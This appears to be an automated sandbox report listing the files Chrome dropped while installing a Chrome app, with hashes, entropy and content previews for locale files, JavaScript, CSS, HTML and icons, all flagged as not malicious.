                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):595
                                                                                                                                                                                Entropy (8bit):5.210259193489374
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
                                                                                                                                                                                MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                                                SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                                                SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                                                SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):634
                                                                                                                                                                                Entropy (8bit):5.386215984611281
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
                                                                                                                                                                                MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                                                SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                                                SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                                                SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):7780
                                                                                                                                                                                Entropy (8bit):5.791315351651491
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
                                                                                                                                                                                MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                                                SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                                                SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                                                SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\craw_background.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):544643
                                                                                                                                                                                Entropy (8bit):5.385396177420207
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
                                                                                                                                                                                MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                                                SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                                                SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                                                SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\craw_window.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):261316
                                                                                                                                                                                Entropy (8bit):5.444466092380538
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
                                                                                                                                                                                MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                                                SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                                                SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                                                SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\css\craw_window.css
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1741
                                                                                                                                                                                Entropy (8bit):4.912380256743454
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
                                                                                                                                                                                MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                                                SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                                                SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                                                SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\html\craw_window.html
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):810
                                                                                                                                                                                Entropy (8bit):4.723481385335562
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
                                                                                                                                                                                MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                                                SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                                                SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                                                SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: <!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\flapper.gif
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):70364
                                                                                                                                                                                Entropy (8bit):7.119902236613185
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
                                                                                                                                                                                MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                                                SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                                                SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                                                SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\icon_128.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4364
                                                                                                                                                                                Entropy (8bit):7.915848007375225
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
                                                                                                                                                                                MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                                                SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                                                SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                                                SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{*.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.*].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...|....
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\icon_16.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):558
                                                                                                                                                                                Entropy (8bit):7.505638146035601
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
                                                                                                                                                                                MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                                                SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                                                SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                                                SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.|`......p...f.?.D$.y^..........y*...\..Z..t6..oRj.@&.u..G.qN).t.-V*.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\topbar_floating_button.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):160
                                                                                                                                                                                Entropy (8bit):5.475799237015411
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
                                                                                                                                                                                MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                                                SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                                                SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                                                SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\topbar_floating_button_close.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):252
                                                                                                                                                                                Entropy (8bit):6.512071394066515
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
                                                                                                                                                                                MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                                                SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                                                SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                                                SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\topbar_floating_button_hover.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):160
                                                                                                                                                                                Entropy (8bit):5.423186859407619
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
                                                                                                                                                                                MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                                                SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                                                SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                                                SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\topbar_floating_button_maximize.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):166
                                                                                                                                                                                Entropy (8bit):5.8155898293424775
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
                                                                                                                                                                                MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                                                SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                                                SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                                                SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\images\topbar_floating_button_pressed.png
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):160
                                                                                                                                                                                Entropy (8bit):5.46068685940762
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
                                                                                                                                                                                MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                                                SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                                                SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                                                SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\manifest.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1322
                                                                                                                                                                                Entropy (8bit):5.449026004350873
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
                                                                                                                                                                                MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                                                SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                                                SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                                                SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                                                Malicious:false
